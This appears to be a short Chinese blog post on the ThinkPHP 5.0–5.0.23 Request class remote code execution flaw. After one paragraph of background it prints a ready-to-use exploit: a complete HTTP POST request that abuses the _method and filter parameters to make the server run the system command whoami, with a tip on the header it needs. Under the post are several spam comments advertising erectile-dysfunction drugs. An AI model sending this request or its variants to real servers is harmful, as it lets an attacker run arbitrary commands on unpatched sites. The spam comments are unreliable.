⭐ThinkPHP5 核心类 Request 远程代码漏洞

原创 sauren  2019-01-14 11:21  阅读 7,813 views 次 评论 3 条

2019年1月11日,ThinkPHP团队发布了一个补丁更新,修复了一处由于不安全的动态函数调用导致的远程代码执行漏洞。该漏洞危害程度非常高,默认条件下即可执行远程代码。根据博文,具体受影响的版本为ThinkPHP5.0-5.0.23完整版。

完整漏洞分析可以前往https://paper.seebug.org/787/

该漏洞使用exp:

POST /tp523/public/index.php?s=captcha HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

 

需要注意的是,Content-Type: application/x-www-form-urlencoded 此header需要添加,以便POST参数的解析。

 

本文地址:/archives/153.html
版权声明:本文为原创文章,版权归 sauren 所有,欢迎分享本文,转载请保留出处!
高性能云服务器特惠

发表评论


表情

  1. AaronFow
    AaronFow @回复

    http://levitra-20-mg.com/ – levitra professional

  2. BennyPoold
    BennyPoold @回复

    kamagra

  3. BrettVaR
    BrettVaR @回复

    indian generic viagra